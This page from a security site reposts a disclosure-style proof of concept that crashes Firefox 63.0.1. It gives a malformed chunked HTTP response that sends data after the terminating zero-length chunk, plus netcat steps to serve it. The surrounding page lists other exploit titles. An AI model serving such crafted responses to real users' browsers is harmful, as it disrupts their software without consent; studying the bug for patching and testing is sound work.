首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 63.0.1 - Denial of Service (PoC)
来源:vfocus.net 作者:CHEBROLU 发布时间:2018-12-04  
# Exploit Title: Mozilla Firefox 63.0.1 - Denial of Service (PoC)
# Date: 2018-11-29
# Exploit Author: SAIKUMAR CHEBROLU
# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
# Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1504512
# Version: Firefox 63.0.1
# Tested on: Windows 10
# CVE : No CVE is been assigned to this bug.
 
# To exploit this vulnerability please follow the below steps.
# Firefox is being crashed, when it tried to process the chunked data. when Transfer-Encoding header
# is used, we suppose to send the data in the chunks form. When all the chunks being transferred,
# we need to tell the client with chunk length zero. so that it understands chunked stream completed.
 
# But if we send the data after sending zero length, then firefox not able to understand it,
# and it being crashed.
 
# Example:
 
5
 
Don't
 
5
 
be af
 
5
 
firef
 
5
 
ox is
 
0     
 
Crash       (after saying it is end, we still sending some data)   
 
\r\n
 
# here we are saying no chunked data after this.so that it should end with \r\n. But we
# are sending some data after this also. Like
 
# Steps to reproduce the crash
 
1)download the firefoxcrash.txt
 
2)nc -lp 8000 < firefoxcrash.txt
 
3)browe the url from firefox like  http://localhost:8000
 
4)then close the netcat client. then you will obserev the firefox crash.
 
# fireforcrash.txt
 
HTTP/1.1 200 ok
Content-type: application/octet-stream
Content-disposition: attachment; filename="crash.txt"
Transfer-Encoding: chunked
Connection: close
 
5
I am
5
 be a
5
fraid
5
 to l
5
ook a
5
t thi
5
s mes
5
sage.
5
 It i
5
s com
5
plete
5
ly ha
5
rmles
5
s. Re
5
ally!
0
foobar
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla! Component JE Photo Gal
·Apache Superset 0.23 - Remote
·PaloAlto Networks Expedition M
·NEC Univerge Sv9100 WebPro 6.0
·Fleetco Fleet Maintenance Mana
·Emacs movemail Privilege Escal
·CyberArk 9.7 - Memory Disclosu
·HP Intelligent Management Java
·Joomla JCE 2.6.33 Arbitrary Fi
·Microsoft Lync for Mac 2011 -
·Apache Spark - Unauthenticated
·Xorg X11 Server (AIX) - Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved